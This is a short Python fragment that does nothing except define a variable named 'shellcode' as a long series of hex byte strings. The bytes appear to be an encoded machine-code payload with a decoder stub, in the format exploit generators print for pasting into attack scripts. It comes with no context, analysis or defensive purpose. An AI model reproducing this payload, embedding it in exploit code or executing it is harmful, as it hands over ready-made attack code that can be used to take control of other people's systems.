shellcode =  b""
shellcode += b"\xdb\xcd\xd9\x74\x24\xf4\x5e\xb8\x1f\x83\xfd"
shellcode += b"\x9c\x2b\xc9\xb1\x52\x83\xee\xfc\x31\x46\x13"
shellcode += b"\x03\x59\x90\x1f\x69\x99\x7e\x5d\x92\x61\x7f"
shellcode += b"\x02\x1a\x84\x4e\x02\x78\xcd\xe1\xb2\x0a\x83"
shellcode += b"\x0d\x38\x5e\x37\x85\x4c\x77\x38\x2e\xfa\xa1"
shellcode += b"\x77\xaf\x57\x91\x16\x33\xaa\xc6\xf8\x0a\x65"
shellcode += b"\x1b\xf9\x4b\x98\xd6\xab\x04\xd6\x45\x5b\x20"
shellcode += b"\xa2\x55\xd0\x7a\x22\xde\x05\xca\x45\xcf\x98"
shellcode += b"\x40\x1c\xcf\x1b\x84\x14\x46\x03\xc9\x11\x10"
shellcode += b"\xb8\x39\xed\xa3\x68\x70\x0e\x0f\x55\xbc\xfd"
shellcode += b"\x51\x92\x7b\x1e\x24\xea\x7f\xa3\x3f\x29\xfd"
shellcode += b"\x7f\xb5\xa9\xa5\xf4\x6d\x15\x57\xd8\xe8\xde"
shellcode += b"\x5b\x95\x7f\xb8\x7f\x28\x53\xb3\x84\xa1\x52"
shellcode += b"\x13\x0d\xf1\x70\xb7\x55\xa1\x19\xee\x33\x04"
shellcode += b"\x25\xf0\x9b\xf9\x83\x7b\x31\xed\xb9\x26\x5e"
shellcode += b"\xc2\xf3\xd8\x9e\x4c\x83\xab\xac\xd3\x3f\x23"
shellcode += b"\x9d\x9c\x99\xb4\xe2\xb6\x5e\x2a\x1d\x39\x9f"
shellcode += b"\x63\xda\x6d\xcf\x1b\xcb\x0d\x84\xdb\xf4\xdb"
shellcode += b"\x0b\x8b\x5a\xb4\xeb\x7b\x1b\x64\x84\x91\x94"
shellcode += b"\x5b\xb4\x9a\x7e\xf4\x5f\x61\xe9\x3b\x37\x13"
shellcode += b"\x59\xd3\x4a\xe3\x98\x9f\xc2\x05\xf0\xcf\x82"
shellcode += b"\x9e\x6d\x69\x8f\x54\x0f\x76\x05\x11\x0f\xfc"
shellcode += b"\xaa\xe6\xde\xf5\xc7\xf4\xb7\xf5\x9d\xa6\x1e"
shellcode += b"\x09\x08\xce\xfd\x98\xd7\x0e\x8b\x80\x4f\x59"
shellcode += b"\xdc\x77\x86\x0f\xf0\x2e\x30\x2d\x09\xb6\x7b"
shellcode += b"\xf5\xd6\x0b\x85\xf4\x9b\x30\xa1\xe6\x65\xb8"
shellcode += b"\xed\x52\x3a\xef\xbb\x0c\xfc\x59\x0a\xe6\x56"
shellcode += b"\x35\xc4\x6e\x2e\x75\xd7\xe8\x2f\x50\xa1\x14"
shellcode += b"\x81\x0d\xf4\x2b\x2e\xda\xf0\x54\x52\x7a\xfe"
shellcode += b"\x8f\xd6\x9a\x1d\x05\x23\x33\xb8\xcc\x8e\x5e"
shellcode += b"\x3b\x3b\xcc\x66\xb8\xc9\xad\x9c\xa0\xb8\xa8"
shellcode += b"\xd9\x66\x51\xc1\x72\x03\x55\x76\x72\x06"
